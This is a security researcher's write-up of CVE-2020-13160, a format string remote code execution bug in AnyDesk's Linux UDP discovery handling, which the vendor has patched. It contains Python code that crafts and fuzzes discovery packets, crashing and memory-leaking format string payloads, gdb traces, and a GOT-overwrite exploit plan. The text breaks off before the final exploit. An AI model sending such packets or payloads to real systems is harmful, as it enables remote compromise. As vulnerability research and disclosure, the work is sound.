AnyDesk UDP Discovery Remote Code Execution (CVE-2020-13160)

One of my goals for this year is to spend a little more of my spare time on real-world applications. With that in mind I took a look at the remote desktop application AnyDesk, which is quickly rising in popularity, and not only because of COVID-19. AnyDesk is available for a variety of operating systems including Windows, Linux, Android and iOS. By reversing and fuzzing the Linux version 5.5.2 of the application I was able to find a format string vulnerability, which can be used to gain Remote Code Execution (RCE) by sending a single UDP packet to the target machine. AnyDesk took the issue very seriously. They released a patch (5.5.3) only three days after my notification and paid me a bounty of 5,000 EUR. The vulnerability is tracked as CVE-2020-13160. In this article I want to share all the steps involved in finding the vulnerability, understanding the bug and developing the RCE exploit. The article is divided into the following sections:

Fuzzing
Bug
Exploit
    – Strategy
    – The v in vsnprintf
    – Gaining arbitrary write
    – Controlling the instruction pointer
    – Hitting our shellcode: dynamic field width
    – Final exploit
Conclusion


Fuzzing

The AnyDesk application is running multiple processes with different permissions. The most valuable target is the service process /usr/bin/anydesk --service, since this process is running with root privileges. There are two older CVEs (CVE-2017-14397 and CVE-2018-13102), which target this process on Windows in order to escalate privileges. Both of these exploits are DLL injection/preloading vulnerabilities, which only work locally. My desire was to find a vulnerability, which can be exploited remotely.

At first we need to figure out which remote communication with the AnyDesk application is possible. This can simply be done by starting the application and using netstat to determine on which ports the application is listening:

user@w00d:~$ sudo netstat -tulpn | grep anydesk        
tcp        0      0 0.0.0.0:7070            0.0.0.0:*               LISTEN      598/anydesk         
udp        0      0 0.0.0.0:50001           0.0.0.0:*                           598/anydesk   

Accordingly the application is listening on TCP port 7070 and UDP port 50001. By displaying all anydesk processes, we can see that the listening process is the service process itself (PID 598). Also note the traybar process (PID 2983) as well as the front-end process (PID 3421):

user@w00d:~$ sudo ps aux | grep anydesk
root       598  0.0  0.3 531172 28620 ?        Ssl  08:56   0:02 /usr/bin/anydesk --service
user      2983  0.0  0.2 744288 23736 tty2     Sl+  08:58   0:00 /usr/bin/anydesk --tray
user      3421  0.0  0.4 864624 37760 tty2     Sl+  09:01   0:00 /usr/bin/anydesk

Before we can reasonably fuzz the application, we have to determine what data the application is usually expecting to receive on these ports. In order to get some sample data, we can inspect all traffic related to these ports using wireshark while interacting with the application.

According to the observations we can make with wireshark, TCP port 7070 is used for the actual remote desktop connection and uses TLS to encrypt the traffic. The details are not relevant for our considerations here. The relevant port is UDP 50001, which is used to announce AnyDesk clients within a local network. On startup of AnyDesk we can see that our client sends UDP packets to 239.255.102.18 in order to announce its presence. The packet contains the hostname (w00d), the username (scryh), a profile picture as well as a few other pieces of information:

Assuming that these announcements are also processed by our own client, we now have some legitimate data in order to fuzz the application. At first I started by fuzzing the application using fuzzotron, which is written in C and is quite fast. fuzzotron uses radamsa and/or blab for the mutation of the input data. The setup is straightforward. We simply put our initial data observed in wireshark in a test-case file and then run fuzzotron providing among others the IP address and port as well as the PID, which fuzzotron should monitor for possible crashes.

Unfortunately I could not find any flaws that seemed to be exploitable, so I decided to change the approach. Instead of directly targeting the service process, which is listening on the network socket, we can focus on the front-end process (PID 3421 in the output above). The front-end process is responsible for displaying the GUI to the user and communicates with the service process to exchange information relevant for the GUI. When the service process receives a valid UDP announcement frame, this frame is passed to the front-end process in order to display the announced device within the GUI:

To make our fuzzing input reach the front-end process we have to send valid announcement frames. The problem here is that most of the frames produced by the fuzzer we used so far are not valid, because they are mutated without any knowledge of the specific format of these frames. Accordingly most of the fuzzer-mutated frames are dropped by the service process and never reach the front-end process.

In order to create valid announcement frames we have to understand how the frames are built. Fortunately the format is not very complicated. By changing settings like our username or hostname and then observing the corresponding announcement frames our client is sending, we can derive how the frames are built. Among other things a frame contains the AnyDesk ID (4-byte), an operating system ID (1-byte) as well as the hostname and username, which are both transmitted as a 4-byte length field (big-endian) followed by the actual data. There are a few other fields and static values, which are not relevant for our considerations. The following python script creates a valid frame based on the given parameters and sends it to our local machine on UDP port 50001:

#!/usr/bin/env python

import struct
import socket

ip = '127.0.0.1'
port = 50001

def gen_discover_packet(ad_id, os, hn, user, inf, func):
  d  = chr(0x3e)+chr(0xd1)+chr(0x1)
  d += struct.pack('>I', ad_id)
  d += struct.pack('>I', 0)
  d += chr(0x2)+chr(os)
  d += struct.pack('>I', len(hn)) + hn
  d += struct.pack('>I', len(user)) + user
  d += struct.pack('>I', 0)
  d += struct.pack('>I', len(inf)) + inf
  d += chr(0)
  d += struct.pack('>I', len(func)) + func
  d += chr(0x2)+chr(0xc3)+chr(0x51)
  return d

p = gen_discover_packet(4919, 1, 'custom host', 'custom username', 'ad', 'main')
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.sendto(p, (ip, port))
s.close()
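The script above relies on Python 2 string semantics (chr() results concatenated with struct.pack() output). As a minimal sketch for readers on Python 3, the same field layout can be expressed with bytes. The function names build_discovery_frame and read_hostname are my own and not part of AnyDesk; the fields marked as unknown are simply copied from the script above, and the fixed hostname offset only follows from that layout:

```python
import struct


def _length_prefixed(data: bytes) -> bytes:
    """4-byte big-endian length followed by the raw data."""
    return struct.pack(">I", len(data)) + data


def build_discovery_frame(ad_id: int, os_id: int, hostname: bytes,
                          username: bytes, inf: bytes = b"ad",
                          func: bytes = b"main") -> bytes:
    """Python 3 sketch of gen_discover_packet with the same field order."""
    frame = bytes([0x3E, 0xD1, 0x01])        # static header bytes
    frame += struct.pack(">I", ad_id)        # AnyDesk ID (4 bytes)
    frame += struct.pack(">I", 0)            # unknown, always 0 in the script
    frame += bytes([0x02, os_id])            # static byte + operating system ID
    frame += _length_prefixed(hostname)
    frame += _length_prefixed(username)
    frame += struct.pack(">I", 0)            # unknown, always 0 in the script
    frame += _length_prefixed(inf)
    frame += b"\x00"
    frame += _length_prefixed(func)
    frame += bytes([0x02, 0xC3, 0x51])       # static trailer bytes
    return frame


def read_hostname(frame: bytes) -> bytes:
    """Extract the hostname field again (it starts after 13 fixed bytes)."""
    offset = 3 + 4 + 4 + 2
    (length,) = struct.unpack_from(">I", frame, offset)
    return frame[offset + 4:offset + 4 + length]
```

Sending the result works exactly as before, e.g. sock.sendto(build_discovery_frame(4919, 1, b'custom host', b'custom username'), (ip, port)).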

After running the script we can see in the GUI that the front-end received the announcement and the fake device is displayed:

Now we are ready to explicitly fuzz certain fields of the frame. In order to do this we extend the python script to serve as our fuzzer. We can generate the actual fuzzing input by using radamsa again. Also we will monitor the front-end process and dump the last 10 fuzzing inputs, if the process died. The full fuzzer script, which targets the hostname, looks like this:

#!/usr/bin/env python

import struct
import socket
import subprocess
import psutil
import os
import time

ip = '127.0.0.1'
port = 50001
host_payloads = [''] * 10
dump_idx = 0


def mutate(pl):
  p = subprocess.Popen(['/usr/bin/radamsa', '-'], stdin=subprocess.PIPE, stdout=subprocess.PIPE)
  return p.communicate(pl)[0]


def isAlive():
  for p in psutil.process_iter():
    if (p.name() == 'anydesk' and len(p.cmdline()) == 1): return True
  return False


def gen_discover_packet(ad_id, os, hn, user, inf, func):
  d  = chr(0x3e)+chr(0xd1)+chr(0x1)
  d += struct.pack('>I', ad_id)
  d += struct.pack('>I', 0)
  d += chr(0x2)+chr(os)
  d += struct.pack('>I', len(hn)) + hn
  d += struct.pack('>I', len(user)) + user
  d += struct.pack('>I', 0)
  d += struct.pack('>I', len(inf)) + inf
  d += chr(0)
  d += struct.pack('>I', len(func)) + func
  d += chr(0x2)+chr(0xc3)+chr(0x51)
  return d


def dump():
  global dump_idx
  print('dumping '+str(dump_idx))
  os.system('mkdir loot'+str(dump_idx))
  for i in range(len(host_payloads)):
    f = open('./loot'+str(dump_idx)+'/host_payload'+str(i), 'wb')
    f.write(host_payloads[i])
    f.close()
  dump_idx += 1
  os.system('anydesk&')
  time.sleep(5)


idx = 0
while True:
  time.sleep(5.0)
  host = mutate('host')
  if (len(host) > 45000): continue # max length
  host_payloads[idx%len(host_payloads)] = host
  p = gen_discover_packet(4919, 2, host, 'user', 'ad', 'main')
  s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
  s.sendto(p, (ip, port))
  s.close()
  idx += 1
  if (not isAlive()): dump()

The sleep time for each fuzzing iteration is quite high (5 seconds), but it turned out that the GUI is only updated every 5 seconds. At first I thought about patching the binary in order to shorten the update interval, but before digging into this I decided to just let the fuzzer run overnight.
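One detail of the script worth pointing out: host_payloads is indexed with idx modulo 10, so the dumped files host_payload0 to host_payload9 are not necessarily in the order in which the payloads were sent. A small sketch of an alternative that keeps the order, using collections.deque, could look like this (the class name PayloadHistory and its methods are made up for illustration and are not part of the original fuzzer):

```python
from collections import deque
import os


class PayloadHistory:
    """Keeps the most recent payloads, oldest first."""

    def __init__(self, size=10):
        # A deque with maxlen silently drops the oldest entry when full.
        self._payloads = deque(maxlen=size)

    def record(self, payload):
        self._payloads.append(payload)

    def snapshot(self):
        return list(self._payloads)

    def dump(self, directory):
        """Write the payloads to <directory>/host_payload<i>, oldest first."""
        os.makedirs(directory, exist_ok=True)
        for i, payload in enumerate(self._payloads):
            with open(os.path.join(directory, "host_payload%d" % i), "wb") as f:
                f.write(payload)
```

With this variant the file with the highest index is always the payload that was sent last before the crash was detected.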

The next day the fuzzing results were ready to be evaluated. The front-end actually crashed a few times and the script stored the fuzzing inputs on disk. At first we need to determine which exact payload triggered the crash. Since we saved the last 10 payloads sent to the application, we just need to resend these payloads and determine which one makes the application crash. This can be done using the following script:

#!/usr/bin/env python

import struct
import socket
import sys

ip = '127.0.0.1'
port = 50001

def gen_discover_packet(ad_id, os, hn, user, inf, func):
  ...

host = open(sys.argv[1]).read()
p = gen_discover_packet(4919, 2, host, 'user', 'ad', 'main')
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.sendto(p, (ip, port))
s.close()

By sending the following payload the front-end crashes:

user@w00d:~$ ./resend.py loot2/host_payload4

... crash ...

user@w00d:~$ hexdump -C loot2/host_payload4
00000000  61 61 61 61 25 64 25 6e  25 70 25 64 24 2b f3 a0  |aaaa%d%n%p%d$+..|
00000010  81 9c 81 bd 0b 7c                                 |.....||
00000016

By fuzzing the AnyDesk front-end process with a python script, which produces valid announcement frames and mutates the hostname using radamsa, we successfully generated an input that crashes the application. The next step is to analyze the bug in order to determine whether we can exploit it.

Bug

So far we have fuzzed the AnyDesk front-end and identified an input which makes the front-end crash. The next step is to determine what the cause of this crash is and to examine if it is based on a bug which we can exploit.

At first we start up the front-end again and attach gdb to it (the pid_frontend.py script merely retrieves the current PID of the front-end process):

root@w00d:~# gdb /usr/bin/anydesk $(~/pid_frontend.py)

...
Reading symbols from /usr/bin/anydesk...(no debugging symbols found)...done.
Attaching to program: /usr/bin/anydesk, process 10911
[New LWP 10913]
[New LWP 10914]
[New LWP 10928]
[New LWP 10931]
[New LWP 10938]
[New LWP 10941]
[New LWP 10942]
[New LWP 10943]
[New LWP 10944]
[New LWP 10945]
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/x86_64-linux-gnu/libthread_db.so.1".

[----------------------------------registers-----------------------------------]
RAX: 0xfffffffffffffdfc 
RBX: 0x1cf7720 --> 0x100000005 
RCX: 0x7f491870ebf9 (<__GI___poll+73>:	cmp    rax,0xfffffffffffff000)
RDX: 0x37a0 
RSI: 0x3 
RDI: 0x1cf7720 --> 0x100000005 
RBP: 0x3 
RSP: 0x7ffe12cbcfb0 --> 0x1aa05cc --> 0x2 
RIP: 0x7f491870ebf9 (<__GI___poll+73>:	cmp    rax,0xfffffffffffff000)
R8 : 0x0 
R9 : 0x1ab6720 --> 0x1900000024 
R10: 0x1ce3000 --> 0x1ab6720 --> 0x1900000024 
R11: 0x293 
R12: 0x37a0 
R13: 0x37a0 
R14: 0x7f491d0b9f70 (<g_poll>:	mov    esi,esi)
R15: 0x3
EFLAGS: 0x293 (CARRY parity ADJUST zero SIGN trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x7f491870ebef <__GI___poll+63>:	mov    rdi,rbx
   0x7f491870ebf2 <__GI___poll+66>:	mov    eax,0x7
   0x7f491870ebf7 <__GI___poll+71>:	syscall 
=> 0x7f491870ebf9 <__GI___poll+73>:	cmp    rax,0xfffffffffffff000
   0x7f491870ebff <__GI___poll+79>:	ja     0x7f491870ec32 <__GI___poll+130>
   0x7f491870ec01 <__GI___poll+81>:	mov    edi,r8d
   0x7f491870ec04 <__GI___poll+84>:	mov    DWORD PTR [rsp+0xc],eax
   0x7f491870ec08 <__GI___poll+88>:	call   0x7f491872a740 <__libc_disable_asynccancel>
[------------------------------------stack-------------------------------------]
0000| 0x7ffe12cbcfb0 --> 0x1aa05cc --> 0x2 
0008| 0x7ffe12cbcfb8 --> 0x1cf7720 --> 0x100000005 
0016| 0x7ffe12cbcfc0 --> 0x1957be0 --> 0x0 
0024| 0x7ffe12cbcfc8 --> 0x3 
0032| 0x7ffe12cbcfd0 --> 0x1cf7720 --> 0x100000005 
0040| 0x7ffe12cbcfd8 --> 0x7f491d0aa5c9 (mov    r13d,eax)
0048| 0x7ffe12cbcfe0 --> 0x0 
0056| 0x7ffe12cbcfe8 --> 0x101957be0 
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
0x00007f491870ebf9 in __GI___poll (fds=0x1cf7720, nfds=0x3, timeout=0x37a0) at ../sysdeps/unix/sysv/linux/poll.c:29
29	../sysdeps/unix/sysv/linux/poll.c: No such file or directory.
gdb-peda$ c
Continuing.

Now we resend the payload, which caused the crash:

user@w00d:~$ ./resend.py loot2/host_payload4

As expected the application raises a segmentation fault:

Thread 1 "anydesk" received signal SIGSEGV, Segmentation fault.

[----------------------------------registers-----------------------------------]
RAX: 0x0 
RBX: 0x7ffe12cbb800 ("Failed to set text from markup due to error parsing markup: Error on line 1 char 56: Invalid UTF-8 encoded text in name - not valid 'aaaa%d%n%p%d$+\201\275\v|'")
RCX: 0x0 
RDX: 0x7ffe12cbc4f8 --> 0x0 
RSI: 0x7ffe12cbb568 --> 0xd24f18983b49a900 
RDI: 0x7ffe12cbb5b0 --> 0x7ffefbad8001 
RBP: 0x7ffe12cbb5a0 --> 0x7ffe12cbbc00 ("Failed to set text from markup due to error parsing markup: Error on line 1 char 56: Invalid UTF-8 encoded text in name - not valid 'aaaa30849456\275\313\022\376\177")
RSP: 0x7ffe12cbb030 --> 0x7f491ec3a6f0 (<gtk_widget_destroy>:	push   rbx)
RIP: 0x7f4918657932 (<_IO_vfprintf_internal+9634>:	mov    DWORD PTR [rax],r13d)
R8 : 0x0 
R9 : 0x0 
R10: 0x0 
R11: 0x7ffe12cbb88c --> 0xf32b24642570256e 
R12: 0x7ffe12cbc4c8 --> 0x3000000020 (' ')
R13: 0x91 
R14: 0x7ffe12cbb5b0 --> 0x7ffefbad8001 
R15: 0x6e ('n')
EFLAGS: 0x10212 (carry parity ADJUST zero sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x7f4918657928 <_IO_vfprintf_internal+9624>:	add    eax,0x8
   0x7f491865792b <_IO_vfprintf_internal+9627>:	mov    DWORD PTR [r12],eax
   0x7f491865792f <_IO_vfprintf_internal+9631>:	mov    rax,QWORD PTR [rdx]
=> 0x7f4918657932 <_IO_vfprintf_internal+9634>:	mov    DWORD PTR [rax],r13d
   0x7f4918657935 <_IO_vfprintf_internal+9637>:	jmp    0x7f4918655930 <_IO_vfprintf_internal+1440>
   0x7f491865793a <_IO_vfprintf_internal+9642>:	mov    QWORD PTR [rbp-0x4e8],r11
   0x7f4918657941 <_IO_vfprintf_internal+9649>:	mov    QWORD PTR [rbp-0x4e0],rax
   0x7f4918657948 <_IO_vfprintf_internal+9656>:	call   0x7f4918684150 <_IO_vtable_check>
[------------------------------------stack-------------------------------------]
0000| 0x7ffe12cbb030 --> 0x7f491ec3a6f0 (<gtk_widget_destroy>:	push   rbx)
0008| 0x7ffe12cbb038 --> 0x0 
0016| 0x7ffe12cbb040 --> 0x7ffe12cbb88a ("d%n%p%d$+\201\275\v|'")
0024| 0x7ffe12cbb048 --> 0x7ffe00000000 
0032| 0x7ffe12cbb050 --> 0x0 
0040| 0x7ffe12cbb058 --> 0x1 
0048| 0x7ffe12cbb060 --> 0xffffffffffffffff 
0056| 0x7ffe12cbb068 --> 0x100000000 
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x00007f4918657932 in _IO_vfprintf_internal (s=s@entry=0x7ffe12cbb5b0, 
    format=format@entry=0x7ffe12cbb800 "Failed to set text from markup due to error parsing markup: Error on line 1 char 56: Invalid UTF-8 encoded text in name - not valid 'aaaa%d%n%p%d$+\201\275\v|'", ap=ap@entry=0x7ffe12cbc4c8) at vfprintf.c:1642
1642	vfprintf.c: No such file or directory.

As we can see, the crash is caused by the instruction mov DWORD PTR [rax], r13d within the function _IO_vfprintf_internal. Since the value of rax is 0 a segmentation fault is raised. Using the command bt we can print the stacktrace:

gdb-peda$ bt
#0  0x00007f4918657932 in _IO_vfprintf_internal (s=s@entry=0x7ffe12cbb5b0, 
    format=format@entry=0x7ffe12cbb800 "Failed to set text from markup due to error parsing markup: Error on line 1 char 56: Invalid UTF-8 encoded text in name - not valid 'aaaa%d%n%p%d$+\201\275\v|'", ap=ap@entry=0x7ffe12cbc4c8) at vfprintf.c:1642
#1  0x00007f4918682910 in _IO_vsnprintf (
    string=0x7ffe12cbbc00 "Failed to set text from markup due to error parsing markup: Error on line 1 char 56: Invalid UTF-8 encoded text in name - not valid 'aaaa30849456\275\313\022\376\177", maxlen=<optimized out>, 
    format=0x7ffe12cbb800 "Failed to set text from markup due to error parsing markup: Error on line 1 char 56: Invalid UTF-8 encoded text in name - not valid 'aaaa%d%n%p%d$+\201\275\v|'", args=0x7ffe12cbc4c8) at vsnprintf.c:114
#2  0x00000000008ab34b in ?? ()
#3  0x00000000008aba98 in ?? ()
#4  0x0000000000434395 in ?? ()
#5  0x00007f491d0b11cd in g_logv () from /usr/lib/x86_64-linux-gnu/libglib-2.0.so.0
#6  0x00007f491d0b133f in g_log () from /usr/lib/x86_64-linux-gnu/libglib-2.0.so.0
...

According to the output the return address after the vsnprintf call is 0x8ab34b (#2). Let’s examine the code at this address in ghidra:

The call to vsnprintf is at 0x8ab346. The third parameter of the function is the format string to be used (local_cb8). A few lines before we can see that the fourth parameter of the outer function (param_4) is copied into local_cb8 using strncpy. In order to determine which parameters were passed to vsnprintf let’s set a breakpoint on the call and resend the payload:

gdb-peda$ b *0x8ab346
Breakpoint 1 at 0x8ab346
gdb-peda$ c
Continuing.
user@w00d:~$ ./resend.py loot2/host_payload4
[----------------------------------registers-----------------------------------]
RAX: 0x0 
RBX: 0x11c5040 --> 0x21 ('!')
RCX: 0x7ffec15e4248 --> 0x3000000010 
RDX: 0x7ffec15e3580 ("Failed to set text from markup due to error parsing markup: Error on line 1 char 56: Invalid UTF-8 encoded text in name - not valid 'aaaa%d%n%p%d$+\201\275\v|'")
RSI: 0x400 
RDI: 0x7ffec15e3980 --> 0x7 
RBP: 0x5 
RSP: 0x7ffec15e34a0 --> 0x7ffec15e3670 --> 0x0 
RIP: 0x8ab346 (call   0x412d90 <vsnprintf@plt>)
R8 : 0x0 
R9 : 0x10 
R10: 0xffffffa0 
R11: 0x7fb9b72f9550 --> 0xfff08320fff08310 
R12: 0x7ffec15e4248 --> 0x3000000010 
R13: 0xb366d8 --> 0x62696c67 ('glib')
R14: 0x2475ec0 ("Failed to set text from markup due to error parsing markup: Error on line 1 char 56: Invalid UTF-8 encoded text in name - not valid 'aaaa%d%n%p%d$+\201\275\v|'")
R15: 0x4
EFLAGS: 0x246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
   0x8ab336:	lea    rdi,[rsp+0x4e0]
   0x8ab33e:	mov    rcx,r12
   0x8ab341:	mov    esi,0x400
=> 0x8ab346:	call   0x412d90 <vsnprintf@plt>
   0x8ab34b:	lea    rdi,[rsp+0x18]
   0x8ab350:	call   0x412ff0 <time@plt>
   0x8ab355:	lea    rdi,[rsp+0x20]
   0x8ab35a:	xor    esi,esi
Guessed arguments:
arg[0]: 0x7ffec15e3980 --> 0x7 
arg[1]: 0x400 
arg[2]: 0x7ffec15e3580 ("Failed to set text from markup due to error parsing markup: Error on line 1 char 56: Invalid UTF-8 encoded text in name - not valid 'aaaa%d%n%p%d$+\201\275\v|'")
arg[3]: 0x7ffec15e4248 --> 0x3000000010 
[------------------------------------stack-------------------------------------]
0000| 0x7ffec15e34a0 --> 0x7ffec15e3670 --> 0x0 
0008| 0x7ffec15e34a8 --> 0x7ffec15e3600 ("lid 'aaaa%d%n%p%d$+\201\275\v|'")
0016| 0x7ffec15e34b0 --> 0x25ed450 --> 0x0 
0024| 0x7ffec15e34b8 --> 0x7ffec15e3600 ("lid 'aaaa%d%n%p%d$+\201\275\v|'")
0032| 0x7ffec15e34c0 --> 0x7ffec15e3820 --> 0x0 
0040| 0x7ffec15e34c8 --> 0x7fb9bbbe89d4 (<g_hash_table_lookup+52>:	mov    r8d,0x2)
0048| 0x7ffec15e34d0 --> 0x23e8230 --> 0x2253ab0 --> 0x2244340 --> 0x31 ('1')
0056| 0x7ffec15e34d8 --> 0x2622e60 --> 0x0 
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value

Thread 1 "anydesk" hit Breakpoint 1, 0x00000000008ab346 in ?? ()

We hit the breakpoint on the call to vsnprintf. The third parameter (RDX) contains the format string. The passed string obviously contains an error message about an invalid UTF-8 encoded text. But this string does also contain the string, which caused the error: 'aaaa%d%n%p%d$+\201\275\v|'. This is our fuzzing input! In the format string! We have found a format string vulnerability.

In this case the actual crash of the application was caused by the %n format specifier within the fuzzer-generated data. The %n format specifier can be used to write data. The address, where the data in this case is supposed to be written, happened to be null. This caused the segmentation fault.
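The register dump of the crash lets us double-check this. At the faulting instruction (mov DWORD PTR [rax],r13d), R13 holds the value that %n is about to write, which should be the number of characters written so far. The following small calculation is only a sanity check based on the strings visible in the gdb output above (the constant error message prefix, the literal aaaa and the eight digits produced by the first %d):

```python
# Constant part of the glib error message up to and including the opening quote,
# copied from the format string shown in the gdb output.
PREFIX = ("Failed to set text from markup due to error parsing markup: "
          "Error on line 1 char 56: Invalid UTF-8 encoded text in name - not valid '")

LITERAL = "aaaa"          # literal characters at the start of the fuzzed hostname
FIRST_D = "30849456"      # output of the first %d, as seen in the partially built string

written = len(PREFIX) + len(LITERAL) + len(FIRST_D)
print(hex(written))
```

The result is 0x91, which is exactly the value of R13 in the crash dump. The destination pointer loaded into RAX is the next variadic argument, which happened to be 0.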

Analyzing the code a little bit further we can determine that the call to vsnprintf prepares a string, which will be written to the log file (~/.anydesk/anydesk.trace). The fourth parameter of the outer function, which will be used as the format string, is in this case an error message generated by the glib library, which is raised because the text contains an invalid UTF-8 sequence. This error message was obviously assumed to be static. However the error message contains the input, which caused the error (the fuzzed hostname), which we can control. Thus we can control parts of the format string by inserting an invalid UTF-8 sequence into the hostname of an announcement frame. This results in a classical format string vulnerability.

Also it turned out that the vulnerable call is actually made twice. By sending an announcement frame with an invalid UTF-8 sequence and a format specifier ('\x85\xfeTEST %p'), we can see the result in ~/.anydesk/anydesk.trace:

user@w00d:~$ tail -n 3 ~/.anydesk/anydesk.trace 
warning 2020-05-25 08:59:02.119   frontend   main   4431   4431                                  glib - Failed to set text from markup due to error parsing markup: Error on line 1 char 43: Invalid UTF-8 encoded text in name - not valid '??TEST 0x15334e0'
warning 2020-05-25 08:59:02.125   frontend   main   4431   4431                                  glib - Failed to set text from markup due to error parsing markup: Error on line 1 char 43: Invalid UTF-8 encoded text in name - not valid '??TEST 0x15334e0'
   info 2020-05-25 08:59:02.132   frontend   main   4431   4431                     unix_app.frontend - Monitoring online states.

The error message has been written twice to the log file. We can also see how the inserted format specifier (%p) has been evaluated.

After analyzing the segmentation fault discovered by fuzzing the front-end process, we identified that the cause of the crash is a format string vulnerability. The next step is to develop an exploit for the identified vulnerability.

Exploit

Within my writeup on RPISEC/MBE lab04B I described the basics on how to exploit a format string vulnerability using the %n format specifier. This format specifier can be used to write data and also caused the segmentation fault when fuzzing the application. Within this section we will take a look at how to exploit the format string vulnerability in this very specific setting in order to gain Remote Code Execution (RCE).

Strategy

Probably the very first thing everyone does when facing a binary exploitation challenge is to check which security mechanisms are enabled. In this case the result is very surprising:

user@w00d:~$ checksec /usr/bin/anydesk
[*] '/usr/bin/anydesk'
    Arch:     amd64-64-little
    RELRO:    No RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      No PIE (0x400000)
    RWX:      Has RWX segments

Actually no protection mechanisms are enabled, which makes the exploitation easier.

While developing an exploit I would generally suggest disabling ASLR and just keeping in mind that we have to bypass it later. This makes it easier to compare addresses across multiple runs of the application:

user@w00d:~$ echo 0 | sudo tee /proc/sys/kernel/randomize_va_space 
0

The first goal we need to achieve is to control the instruction pointer. Since there is No RELRO, we can use the %n format specifier to overwrite an entry within the Global Offset Table (GOT). As the heap segment, where our input data will be stored, is actually executable, we can store a shellcode there and make the GOT entry point to this shellcode. On the next call of the function whose GOT entry we overwrote, our shellcode is executed.

Although these steps sound quite straightforward, achieving this turned out to be a little bit more challenging. Let’s have a look.

The v in vsnprintf

The next call after the vulnerable call to vsnprintf is a call to the function time. Accordingly we can overwrite the GOT entry of time and thus redirect the control flow immediately after the vsnprintf call. In order to use the %n format specifier to overwrite the GOT entry of time, we need to be able to reference the address of the GOT entry. In a classical format string exploit this is achieved by being able to control data on the stack. Since values stored on the stack beyond the current RSP (that is, at higher addresses) can be referenced with an appropriate argument selector (e.g. %35$n), the desired address can simply be put into the controlled stack data. Using the appropriate argument selector in combination with the %n format specifier causes the function to write the number of characters written so far to this address.

In this case things are a little bit different. As you probably already noticed, the vulnerable call is not made to the function snprintf, whose signature looks like this:

snprintf(char *s, size_t n, const char *format, ...)

…, but rather to vsnprintf, whose signature looks like this:

vsnprintf(char *s, size_t n, const char *format, va_list arg)

The difference here is that the format string arguments are not directly passed as variable arguments (...), but within a va_list parameter (arg). Each of the functions in the printf family has a corresponding va_list function beginning with the letter v:

user@w00d:~$ man 3 printf
...

       #include <stdio.h>

       int printf(const char *format, ...);
       int fprintf(FILE *stream, const char *format, ...);
       int dprintf(int fd, const char *format, ...);
       int sprintf(char *str, const char *format, ...);
       int snprintf(char *str, size_t size, const char *format, ...);

       #include <stdarg.h>

       int vprintf(const char *format, va_list ap);
       int vfprintf(FILE *stream, const char *format, va_list ap);
       int vdprintf(int fd, const char *format, va_list ap);
       int vsprintf(char *str, const char *format, va_list ap);
       int vsnprintf(char *str, size_t size, const char *format, va_list ap);

The structure of va_list is actually specific to the Application Binary Interface (ABI), which e.g. describes the calling convention, how the stack is organized and so on. On x86, where all function parameters are passed on the stack, va_list simply consists of a pointer to the stack area where the original parameters are stored. With x64 things get a little bit more complex. The first six parameters are passed in registers (RDI, RSI, RDX, RCX, R8, R9), and there are also special registers for floating point parameters (XMM0 to XMM7). Additional parameters are passed on the stack as with x86. There is a very good blog post describing the details, which can be found here. The structure of the va_list looks like this on x64:

typedef struct {
  unsigned int gp_offset;
  unsigned int fp_offset;
  void *overflow_arg_area;
  void *reg_save_area;
} va_list[1];

There are two pointers: overflow_arg_area, which points to the first argument originally passed on the stack, and reg_save_area, which points to an area on the stack where the arguments passed via registers are saved (the first six general parameters as well as eight floating point parameters). Both values gp_offset and fp_offset are offsets relative to reg_save_area and reference the first general register parameter (gp_offset) as well as the first floating point parameter (fp_offset). These offsets exist because there are usually other parameters before the variable parameters (e.g. the format string itself).
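To make the layout a bit more tangible, here is a minimal Python sketch that decodes the 24 bytes of such a va_list element with the struct module. It assumes a little-endian x64 Linux target; the helper names and the pointer values in the usage example are hypothetical and only serve as an illustration:

```python
import struct

# unsigned int gp_offset, unsigned int fp_offset,
# void *overflow_arg_area, void *reg_save_area (little-endian, no padding)
VA_LIST = struct.Struct("<IIQQ")

GP_SAVE_BYTES = 6 * 8   # six general purpose registers, 8 bytes each


def parse_va_list(raw: bytes) -> dict:
    """Decode the raw bytes of one va_list element."""
    gp_offset, fp_offset, overflow_arg_area, reg_save_area = VA_LIST.unpack(raw[:VA_LIST.size])
    return {
        "gp_offset": gp_offset,
        "fp_offset": fp_offset,
        "overflow_arg_area": overflow_arg_area,
        "reg_save_area": reg_save_area,
    }


def remaining_gp_register_args(gp_offset: int) -> int:
    """How many general arguments are still fetched from the register save area."""
    return max(0, (GP_SAVE_BYTES - gp_offset) // 8)


# Hypothetical example: two named general parameters were already consumed.
raw = VA_LIST.pack(0x10, 0x30, 0x7FFD00002000, 0x7FFD00001000)
info = parse_va_list(raw)
print(info["gp_offset"], remaining_gp_register_args(info["gp_offset"]))
```

A gp_offset of 0x10 thus means that four more general arguments are read from the register save area before the overflow area is used. The fp_offset of 0x30 (48) simply points past the six saved general purpose registers.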

Let’s have a practical look at this on the AnyDesk front-end. We attach gdb to it and set a breakpoint on the call to vsnprintf:

user@w00d:~$ sudo gdb /usr/bin/anydesk $(~/pid_frontend.py)
...
Attaching to program: /usr/bin/anydesk, process 3863
...
gdb-peda$ b *0x8ab346
Breakpoint 1 at 0x8ab346
gdb-peda$ c
Continuing.

Now we can use the python function again, which we created to generate announcement frames. In this case we send an announcement with the following hostname:

p = gen_discover_packet(4919, 1, '\x85\xfe 1.%p 2.%p 3.%p 4.%p 5.%p 6.%p 7.%p 8.%p 9.%p 10.%p', 'custom username', 'ad', 'main')
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.sendto(p, (ip, port))
s.close()

The beginning of the hostname ('\x85\xfe') is an invalid UTF-8 sequence, which will trigger the format string vulnerability (any other invalid UTF-8 sequence can be used here). After this we use the %p format specifier to print the values of the first ten arguments.
